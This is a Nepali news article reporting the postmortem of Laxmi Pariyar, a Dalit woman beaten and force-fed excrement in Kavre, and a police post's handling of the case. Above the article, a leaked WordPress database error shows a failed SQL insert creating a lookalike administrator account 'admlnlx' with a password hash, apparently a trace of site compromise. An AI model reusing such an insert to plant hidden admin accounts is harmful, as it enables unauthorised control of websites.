WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bamip1cKpVsgHAPS3vz5vjMQoKg2Fr0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 11:45:18', '', 'admlnlx', 'admlnlx')
काभ्रे, पुस १–
काभ्रे सानो वाङ्थलीकी लक्ष्मी परियारको शरीरभरि एकै नासको चोटपटक भेटिएका छन्। मृत्युको सातौ दिन भएको पोष्टमार्टम रिपोर्ट भन्छ–‘शरीर थिलथिलो हुने गरी कुटिएको छ, उनको मृत्युको कारण कुटाइबाहेक अरू केही होइन।’ आजको नयाँ पत्रिका दैनिकमा खबर छ ।
एक सातापछि बिहिवार टिचिङ अस्पतालमा पोस्ट–मार्टम गरिएको हो । ‘टाउकोदेखि पैतालासम्म एकनासका चोटपटक छन्, यिनै चोटका कारण लक्ष्मी परियारको मृत्यु भएको हो, अन्य कुनै कारणले होइन,’ फोरेनसिक बिभागका प्रमुख हरिहर वस्तीले पोष्टमार्टमबाट आएको रिपोर्टबारे भने, ‘मृत्युलगत्तै पोष्टमार्टम गरेको भए धेरै कुरा अझै स्पष्ट भन्न सकिन्थ्यो । सात दिनमा शव धेरै बिग्रिसकेकाले धेरै कुरा रिपोर्टमा दिन सकिँदैन ।’
वस्तीका अनुसार मृतक लक्ष्मीको शरिरमा एकै किसिमका चोट र निलडाम छन् । उनको शरिरको छाला कोतरिएको, टाउकोमा कुटेको डाम, घाँटीमा पनि डाम छ । उनले भने, ‘हामीलेजस्तै मानवताका साथ प्रहरीले अनुसन्धान गरे र वकिलले मुद्दा अघि बढाए कुटपिट गर्नेहरू उम्किन सक्ने कुनै कारण छैन । तर, मुद्दा कसरी अघि बढ्छ, मैले भन्ने विषय होइन ।’
३३ वर्षीया लक्ष्मीलाई अघिल्लो मंगलबार स्थानीय शिक्षकको नेतृत्वमा नाम्लोले बाँधेर मलमुत्र खुवाएको थियो। छातीमा लात्तीले र टाउकोमा चिर्पटले हानेको भन्दै मृतकका छोरा र प्रतक्ष्यदर्शीले बयान दिएका थिए।
कुटपिटपछि घर जान नसकेकी लक्ष्मीलाई छोरा र देवरले दुवै कुमबाट उचाल्दै घर लगेका थिए । एउटी दलित महिलालाई पोलमा बाँधेर मलमूत्र खुवाउँदै निर्घात कुटपिट गर्ने शिक्षकलाई कारबाही गर्नुको सट्टा चौवास प्रहरी चौकीका इन्चार्ज प्रेमपुकार चौधरीले बिहीबार मिलापत्रमा सही गर्न लगाएका थिए । शुक्रबार बिहान लक्ष्मी मृत अवस्थामा भेटिएकी थिइन् ।